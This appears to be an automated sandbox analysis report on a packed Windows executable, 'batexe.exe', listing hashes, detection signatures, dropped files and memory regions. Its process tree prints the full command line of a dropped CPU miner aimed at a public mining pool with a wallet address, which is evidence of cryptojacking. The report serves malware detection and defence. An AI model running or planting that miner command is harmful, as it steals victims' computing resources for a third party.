Analysis

  • max time kernel
    293s
  • max time network
    304s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-ja
  • resource tags

    arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    22-02-2024 12:29

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3832
    • C:\Users\Admin\AppData\Local\Temp\DF15.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\DF15.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\DF15.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4368
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E2AF.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2260
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2140

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\DF15.tmp\b2e.exe

    Filesize

    512KB

    MD5

    e4d2817f5e794155ac4a8a1445b9d728

    SHA1

    07f6972ab84878cee3a3e158cf9b0b27c8ad175d

    SHA256

    24781b2a837565d59faae5eff35a839726a5aa2f952f46e5e5b593f53ab6774b

    SHA512

    9ed2839db8465f9eb07d9bb2d29e1a35cc1c2e0b8c8f52007248752df018c899135e6d3f944e7e1363b3d5fe4928ccb71725fcaafedfd3cd496307619cf164f6

  • C:\Users\Admin\AppData\Local\Temp\DF15.tmp\b2e.exe

    Filesize

    1.9MB

    MD5

    b5ae88e85e1084225ce0118ce701db12

    SHA1

    d4b5002d16549f82c16ef027005c52a58ec9d8c9

    SHA256

    0a02515a7262451015ed48e82191dfffcb03d31b76f1c8fca7ba337acfef9fe8

    SHA512

    5dafba51677f3348a2f19eeaa82142c9aeacba7b4e4d3a6c28bfaba21622842b30086a3036979f16da7a241419ca4c47752cd58a0e42f7c68aada32f59c48e45

  • C:\Users\Admin\AppData\Local\Temp\E2AF.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    448KB

    MD5

    ca0b33f54480aa9c590d09f72e3feb31

    SHA1

    d50dc7dd964feb0d7516c3037e7dc7e008420ae5

    SHA256

    67833a9e63d8b7469a3a3415124a2426893a6174ce2bd88bea520c68319d182d

    SHA512

    266dcd9c5bfe2b117fda6bf7c4250a908233d8474bd0b09596a0bd0fa2e5bc75446a20b46cb7e516ef75b5661bbe16c714e8dcc5962a0f481cbaecdf6135affd

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    320KB

    MD5

    59d36bdd941feb6c770ec68a37e8c21b

    SHA1

    1191d1e478164cd720974ea1ad2bc248999a8d45

    SHA256

    d5227dca74d9be12116b359c9d61265b102c0986eb6196e269cc3e3b895c0293

    SHA512

    b1620dd0763f2f7c263ae69c71eba7cba29d89f1bb551356abb7073e4e7013347345c43f2bad3c4733300c5b98feecf2fd91db2a363c9e5dcdd87f170edbe406

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    448KB

    MD5

    19a61444b6e2d01755ede80960bca19c

    SHA1

    e0c7222784d3e2b3329ec3280648b17fd60ef209

    SHA256

    13fd488b38f3b75438e9ad0a033df005cd397f3c92f43275714a0a7eb3fb4db8

    SHA512

    bc02c82bdac19f10f3e3a93d3f507bb7838c9255b7cff5af6e3a7f3b471dae9c45c52728c3c23857b3402dd1702cb51a20f225a4da992c26a997c26d86b6b1d9

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    384KB

    MD5

    4cb3a8d3af58faf78da4dd33a03029db

    SHA1

    5356e4fb04a7047f6fc82a4e071e4803f97a0f3d

    SHA256

    86df790940bd442466ea58a434a31aaaadd1d23a9e9bf5e6fe625ff49049d620

    SHA512

    244237f4a13a7666e9f9592451dbb8bb18ca1f828d66f97e2890fa8f6be690d8890848102a8be253542c9f4b154d9f0e1aeeee5a867c866b78b64f9949f48c89

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    384KB

    MD5

    eec15153c344f43f1919cb379b9ee2f9

    SHA1

    3e4a09390ac885ea2797209603bcfa1ec6ff0cc6

    SHA256

    4e4d7ecae87e8e656c61af89ef17146baf33fbf09ffbde6ae971d04e8e8f9222

    SHA512

    7cdf3552341d14979838f8fedf9ac63482152f193ab8f7e0af281ec50b2a43312d78c0e22e79989818c5041538fa69769350e1e6cf0789a165be1eb11ee29908

  • \Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    384KB

    MD5

    d1d1f36cdbccda3b96e8c164afb74526

    SHA1

    91bafcd404c8568c9a195ec8cbf9592ea9e17e8b

    SHA256

    ea6e726150aa9a8dcf9ccb6a991440b451f9f2dcc46d93cb35971556879d1d03

    SHA512

    2306e6578ba2217b4f32913e1ac35e0547723b873c11244e96affd05457945373c621ea16a82e1e3aa1a177e3059efc40c8585118c63a3ea145524c51d1d18c9

  • \Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    384KB

    MD5

    b91f7bb5508b343188ec32dcc7880611

    SHA1

    fe2ae7ba4a1bbb2a5df7b73f21a0b8fc745cc11f

    SHA256

    47881756cdfcb302e63efb2016c122a1bb61574d81186275aef3d5a9fb72b84b

    SHA512

    a5b91bc653cbf28219b6f169d5d849fb53eced9a932b8edf468c9092544795ee8120d5c76f0c45f27b7a2464c328f5bffcabf3e83d2e7236263ea930cf92eea0

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    128KB

    MD5

    9746d1ac79c8b499d8b2224394581fa7

    SHA1

    36b1985eabfd8131ad9f2b7f69c903a3fce67629

    SHA256

    77941fbe96e0c797e6cf5419ee32bd3fcee69629cba37750146656a660c37182

    SHA512

    61a6174e2aced5b85cd614ad2f9d3da24c6b91e1fc04e10ff818222c4323cd043a59708bd35af0de84b004bf492fbc157d72907cd1e7ddf7082fc2a3563ef183

  • \Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    320KB

    MD5

    1ae43cc09627ff82d15527ea2693fd76

    SHA1

    c39ffa1a4b80c29fa1f5caed3e7d091253266c66

    SHA256

    b63980c9d592a6d0d8521f74bd4c6f7cc4ae5f8c3320d2bd63764c56648ac45f

    SHA512

    21945e4e2fad3ee2b2a19d19bbbc1ada832c33a0d3bf499d6ac8f093b39021323ea0f7df3d54167a3456cbaf01ff126a6e6abbe17dd4eb8d5a24ca000888c271

  • memory/2140-40-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2140-51-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2140-101-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2140-42-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/2140-41-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/2140-43-0x0000000066870000-0x0000000066908000-memory.dmp

    Filesize

    608KB

  • memory/2140-44-0x00000000010E0000-0x0000000002995000-memory.dmp

    Filesize

    24.7MB

  • memory/2140-45-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2140-96-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2140-91-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2140-56-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2140-66-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2140-71-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2140-81-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2140-86-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3832-6-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB

  • memory/4368-50-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/4368-5-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB